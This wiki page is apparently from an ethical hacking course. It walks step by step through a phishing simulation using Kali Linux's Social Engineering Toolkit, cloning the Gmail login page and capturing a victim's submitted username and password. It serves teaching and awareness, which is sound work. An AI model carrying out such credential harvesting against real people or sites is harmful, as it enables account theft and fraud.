Hands-on: Simulasi Phishing Attack (en)

From OnnoWiki
Revision as of 06:51, 29 October 2024 by Onnowpurbo (talk | contribs) (Created page with "Here is an explanation and example of a '''Phishing Attack''' simulation using '''Kali Linux 2024.3''' in the context of an ethical hacking course. ==Phishing Attack Overview...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Here is an explanation and example of a Phishing Attack simulation using Kali Linux 2024.3 in the context of an ethical hacking course.

Phishing Attack Overview

Phishing is a social engineering attack technique in which an attacker tricks a victim into providing sensitive information such as usernames, passwords, or credit card details through a fake website that appears legitimate. This simulation uses the Social Engineering Toolkit (SET) which is already installed on Kali Linux.

Hands-on Steps: Phishing Attack Simulation on Kali Linux 2024.3

1. Open Kali Linux and Run Social Engineering Toolkit (SET)

SET is a powerful tool for simulating social engineering-based attacks such as phishing. Run the following command to get started:

sudo setoolkit

The SET interface will appear with several options. Select the first option for social engineering attacks.

2. Select Website Attack Vectors

In the SET main menu, select option 2 for *Website Attack Vectors*:

2) Website Attack Vectors

3. Select Credential Harvester Attack Method

Next, select the Credential Harvester method:

3) Credential Harvester Attack Method

This method will capture the credentials (username and password) entered by the victim on the phishing site.

4. Select Site Cloner

To create a fake site that looks like the original site, select the Site Cloner option:

2) Site Cloner

5. Enter Target URL

After selecting Site Cloner, you are asked to enter the URL of the site you want to clone (e.g., Facebook login page, Gmail, etc.). For example, to fake the Gmail login page, type:

https://accounts.google.com

6. IP Address Configuration

SET will ask for the IP address of your phishing server (the computer that SET will run on). To get the IP address, run the command:

ifconfig

Then enter the IP address into SET when prompted.

7. Start Phishing Server

Once all the configurations are complete, SET will start a local phishing server that can be accessed by the target. Every time the victim visits the phishing URL and enters their credentials, SET will capture the information.

8. Simulate Attack

  • Send the generated URL to the target via email, message, or other method. Make sure you have the target's permission, as this is part of ethical hacking.
  • When the victim visits the fake site and enters their credentials, this information will be captured by SET and displayed in your Kali Linux terminal.

9. Capture and Display Credentials

On the SET screen, you will see the results of successfully captured credentials:

[*] WE GOT A HIT! POST Data: user=exampleuser&pass=examplepassword

Here, the victim's username and password have been successfully obtained from the fake login page.

Ethical Practices

Phishing is a dangerous attack method if misused. In the context of ethical hacking, this simulation should be done with legitimate permission and only for educational or security testing purposes.

Conclusion

The phishing attack simulation using Kali Linux 2024.3 and Social Engineering Toolkit (SET) provides a real-world view of how this attack is carried out. It is a great way to learn the important aspects of social engineering and helps raise awareness about cybersecurity among internet users.

Interesting Links